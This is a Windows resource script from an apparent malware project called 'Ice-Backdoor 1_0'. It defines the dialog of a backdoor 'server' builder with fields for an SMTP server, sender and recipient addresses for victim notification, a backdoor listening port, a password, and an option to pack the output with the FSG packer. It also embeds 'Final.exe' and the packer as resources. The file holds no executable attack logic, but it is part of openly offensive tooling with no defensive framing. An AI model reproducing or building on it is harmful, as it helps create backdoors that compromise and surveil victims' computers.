;This Resource Script was generated by WinAsm Studio.

#define IDC_STATIC3004 3004
#define IDC_STATIC3015 3015
#define IDC_STATIC3017 3017
#define IDC_STATIC3009 3009
#define IDC_STATIC3010 3010
#define IDC_STATIC3011 3011
#define IDC_STATIC3007 3007
#define IDC_EXIT 3002
#define IDC_SMTP_Addr 3005
#define IDC_Mail_From 3008
#define IDC_Mail_To 3013
#define IDC_Back_Port 3014
#define IDC_Victim_Label 3016
#define IDC_About 3018
#define IDC_MAKE 3020
#define IDC_SMTP_Port 3021
#define MAIN_ICO 10000
#define IDC_FsgPack 3022

12345 RCDATA DISCARDABLE "Final.exe"
MAIN_ICO ICON DISCARDABLE "Ice-Backdoor 1_0/Edit.ico"
12344 RCDATA DISCARDABLE "G:/Documents and Settings/SnowMole/Mes documents/ASM/fsg.exe"

MyDialog DIALOGEX 10,10,228,151
CAPTION "Icing's Edit Server"
FONT 9,"MS Sans Serif"
STYLE 0x96c80880
EXSTYLE 0x00060080
BEGIN
	CONTROL "Exit Program",IDC_EXIT,"Button",0x50800000,26,133,65,12,0x00000000
	CONTROL " SMTP Server :",IDC_STATIC3004,"Static",0x54001200,7,31,51,13,0x00000000
	CONTROL "Enter SMTP Server's Adress",IDC_SMTP_Addr,"Edit",0x54010001,60,31,107,13,0x00000280
	CONTROL " Port :",IDC_STATIC3007,"Static",0x54001200,173,31,23,13,0x00000000
	CONTROL "E-mail's Sender",IDC_Mail_From,"Edit",0x54010001,60,52,107,13,0x00000280
	CONTROL " Mail From :",IDC_STATIC3009,"Static",0x54001200,7,52,51,13,0x00000000
	CONTROL " Mail To :",IDC_STATIC3010,"Static",0x54001200,7,72,51,13,0x00000000
	CONTROL "Backdoor Port :",IDC_STATIC3011,"Static",0x54001200,7,113,55,13,0x00000000
	CONTROL "E-mail's Destinatory",IDC_Mail_To,"Edit",0x54010001,60,72,107,13,0x00000280
	CONTROL "1015",IDC_Back_Port,"Edit",0x54012001,64,113,25,13,0x00000280
	CONTROL "This program is used for setting data into the server, like STMP server, his port, backdoor port, mail adress to send, Password, etc ...",IDC_STATIC3015,"Static",0x54000000,8,4,215,21,0x00000000
	CONTROL "Server's Password",IDC_Victim_Label,"Edit",0x54010001,60,92,107,13,0x00000280
	CONTROL "Password :",IDC_STATIC3017,"Static",0x54001200,7,92,51,13,0x00000000
	CONTROL "?",IDC_About,"Button",0x54800300,212,133,11,12,0x00000000
	CONTROL "Make Server",IDC_MAKE,"Button",0x50800000,124,133,65,12,0x00000000
	CONTROL "25",IDC_SMTP_Port,"Edit",0x54012001,198,31,25,13,0x00000280
	CONTROL "FSG Pack",IDC_FsgPack,"Button",0x50010003,173,53,49,13,0x00000000
END

